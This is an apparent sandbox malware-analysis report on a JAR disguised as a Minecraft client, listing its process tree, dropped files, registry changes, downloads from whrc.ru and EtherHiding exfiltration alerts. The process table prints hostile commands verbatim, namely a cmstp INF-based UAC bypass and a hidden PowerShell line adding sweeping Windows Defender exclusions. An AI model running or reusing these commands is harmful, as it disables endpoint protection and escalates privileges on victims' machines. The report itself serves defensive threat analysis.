File name:

4E-Client-1.21.-latest.jar

Full analysis: https://app.any.run/tasks/16c0dc01-ae0f-45b8-92ce-31614f313837
Verdict: Malicious activity
Analysis date: March 19, 2026, 11:47:22
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
etherhiding
antivm
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

80CE55801C73B86EDD4A6F93325F0C78

SHA1:

3CFEF8DB788C6751AE1231099D5A96EC9719FDFD

SHA256:

2149B3D04F97B53D419F5290396C4B584BD7B625B5440DE36F8DEDCDD51D7D73

SSDEEP:

49152:4hWSelznKrakuO7n9MhzZMUMzkpDeZwLjGEr3k4rWqst5D7nqYAm5j/oBZQJEuRP:4oSedKr379MhzZM3ISSjGErkgWl5XnaW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 4480)
    • Changes Windows Defender settings

      • cmd.exe (PID: 6384)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6792)
    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 6384)
  • SUSPICIOUS

    • Application launched itself

      • javaw.exe (PID: 6148)
    • Executable content was dropped or overwritten

      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Used cmstp for execute code hidden within an inf file

      • javaw.exe (PID: 1536)
    • There is functionality for VM detection antiVM strings (YARA)

      • javaw.exe (PID: 1536)
    • There is functionality for VM detection VMWare (YARA)

      • javaw.exe (PID: 1536)
    • The process executes VB scripts

      • wscript.exe (PID: 7916)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6384)
    • Executing commands from ".cmd" file

      • javaw.exe (PID: 6732)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • cmd.exe (PID: 6384)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7916)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6384)
    • There is functionality for VM detection VirtualBox (YARA)

      • javaw.exe (PID: 1536)
    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 6384)
  • INFO

    • Reads Environment values

      • javaw.exe (PID: 6148)
      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Reads the computer name

      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Create files in a temporary directory

      • javaw.exe (PID: 6148)
      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Reads the machine GUID from the registry

      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Checks supported languages

      • javaw.exe (PID: 6148)
      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
    • Disables trace logs

      • cmstp.exe (PID: 4960)
      • dllhost.exe (PID: 4480)
    • Reads CPU info

      • javaw.exe (PID: 1536)
      • javaw.exe (PID: 6732)
      • javaw.exe (PID: 6148)
    • Creates files or folders in the user directory

      • javaw.exe (PID: 1536)
    • Creates files in the program directory

      • dllhost.exe (PID: 4480)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6792)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 4960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2026:03:19 08:53:12
ZipCRC: 0x00000000
ZipCompressedSize: 2
ZipUncompressedSize: -
ZipFileName: META-INF/
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
11
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
1536"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\4E-Client-1.21.-latest.jar --jwC:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
javaw.exe
User:
admin
Company:
N/A
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4480C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
4960cmstp.exe /au "C:\Users\admin\AppData\Local\Temp\\bnxcjqzhuy.xdmf"C:\Windows\System32\cmstp.exe—javaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.2.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmstp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6148"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\4E-Client-1.21.-latest.jarC:\Program Files\Java\jdk-25.0.2\bin\javaw.exe—explorer.exe
User:
admin
Company:
N/A
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
6384cmd.exe /c C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmdC:\Windows\System32\cmd.exe—javaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6732"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -cp "C:\Users\admin\AppData\Local\Temp\elevator.jar" dev.majanito.Main b64:eyJleGVjdXRpb25FbnZpcm9ubWVudCI6IkRvdWJsZUNsaWNrIiwidXNlcklkIjoiZDM1YWU1NWEtYWRhMS00ZWI2LWFjZDktYzNlNTNkNGViNDZiIn0=C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
wscript.exe
User:
admin
Company:
N/A
Integrity Level:
HIGH
Description:
Java(TM) Platform SE binary
Exit code:
1
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
6792powershell -W Hidden -C "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\Tlmtry' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver\chromedriver.dll' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Security' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp\' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Downloads' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'javaw.exe' -EA 0; Add-MpPreference -ExclusionProcess 'java.exe' -EA 0; Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupts.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Injector.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'chrome.exe' -EA 0; Add-MpPreference -ExclusionProcess 'brave.exe' -EA 0; Add-MpPreference -ExclusionProcess 'msedge.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Telemetry.exe' -EA 0; Add-MpPreference -ExclusionProcess 'abcfg.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Pjibf.exe' -EA 0; Add-MpPreference -ExclusionProcess 'file2.exe' -EA 0; " C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7240\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7244C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
12 590
Read events
12 556
Write events
34
Delete events
0

Modification events

(PID) Process:(7244) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
(PID) Process:(4480) dllhost.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\system32\cmlua.dll,-100
Value:
Connection Manager
(PID) Process:(4960) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:PF_AccessoriesName
Value:
Accessories
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\DllHost_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\DllHost_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\DllHost_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4480) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\DllHost_RASAPI32
Operation:writeName:FileTracingMask
Value:
Executable files
5
Suspicious files
3
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
1536javaw.exeC:\Users\admin\AppData\Local\Temp\elv.vbstext
MD5:AA925E5505E0AC4EC929CE45293C8EDF
SHA256:073754C9C2731697E1E0D2DD9E0FF345D2D39587C4C6C44E524284E32D019E21
1536javaw.exeC:\Users\admin\AppData\Local\Temp\elevator.jarbinary
MD5:C402BD8603481B9FF225698A15B1A472
SHA256:2082BF1A949BE2430B197DAC4ABA022BD7E90B800C1E3B7395F75D05259C1BB7
1536javaw.exeC:\Users\admin\AppData\Local\Temp\jna-1773920865165\jnidispatch.dllexecutable
MD5:2D2475F1F026DD54E9F3E787AE4F81DA
SHA256:5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
1536javaw.exeC:\Users\admin\AppData\Local\Temp\bnxcjqzhuy.xdmftext
MD5:A18FB0BBE3E67074CA6D0134C0B7D5F7
SHA256:FDCEAFE4DCF9CF6D23B2033824275C08EC73D6B01ADC644416E43ECCA94C89C9
6792powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yp3tqzuk.jg2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6732javaw.exeC:\Users\admin\AppData\Local\Temp\jna-1773920876630\jnidispatch.dllexecutable
MD5:2D2475F1F026DD54E9F3E787AE4F81DA
SHA256:5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
6792powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x5hqeby2.t3n.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6792powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5C3784D70BBE3EE68F2EA4E4CCD54305
SHA256:E9FC2461A6AC87A713F8FD1BEC5DC4A52BE62487541A4E4BED0C84EF896F1F33
1536javaw.exeC:\Users\admin\AppData\Local\Temp\lib13714102292376964997.tmpexecutable
MD5:511EB028504E05606965C12048C1439F
SHA256:36E2826A6DF525D18027359F503D36B901436C488718AFA2189BAD398249A67E
1536javaw.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\83aa4cc77f591dfc2374580bbd95f6ba_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:C8366AE350E7019AEFC9D1E6E6A498C6
SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
46
TCP/UDP connections
42
DNS requests
22
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
51.124.78.146:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
—
—
whitelisted
1176
SIHClient.exe
GET
304
135.233.95.144:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
—
—
whitelisted
1176
SIHClient.exe
GET
200
74.178.240.51:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
—
—
whitelisted
—
—
GET
200
185.178.208.162:443
https://whrc.ru/files/jar/module
RU
binary
3.60 Mb
unknown
—
—
GET
200
185.178.208.162:443
https://whrc.ru/files/jar/elevator
RU
binary
3.60 Mb
unknown
1176
SIHClient.exe
GET
200
135.233.95.144:443
https://slscr.update.microsoft.com/sls/ping
US
—
—
whitelisted
5392
svchost.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
1176
SIHClient.exe
GET
304
135.233.95.144:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
—
—
whitelisted
5392
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
3280
svchost.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl
US
binary
400 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5392
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
—
Not routed
—
whitelisted
5276
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8028
slui.exe
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
—
—
92.123.104.6:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
4
System
192.168.100.255:138
—
Not routed
—
whitelisted
1536
javaw.exe
104.21.67.22:443
eth.llamarpc.com
CLOUDFLARENET
US
malicious
5392
svchost.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5392
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5208
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
www.bing.com
  • 92.123.104.6
  • 92.123.104.5
  • 92.123.104.56
  • 92.123.104.53
  • 92.123.104.62
  • 92.123.104.66
  • 92.123.104.67
  • 92.123.104.65
  • 92.123.104.59
whitelisted
google.com
  • 172.217.16.206
whitelisted
eth.llamarpc.com
  • 104.21.67.22
  • 172.67.167.200
malicious
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
eth.api.onfinality.io
  • 51.254.59.59
malicious
whrc.ru
  • 185.178.208.162
malicious
self.events.data.microsoft.com
  • 52.182.141.63
whitelisted

Threats

PID
Process
Class
Message
5392
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
—
—
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
—
—
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
—
—
Misc activity
INFO [ANY.RUN] DDoS-Guard Hosted Web Content observed
—
—
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
—
—
Not Suspicious Traffic
ET INFO JAVA - Java Archive Download
—
—
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
No debug info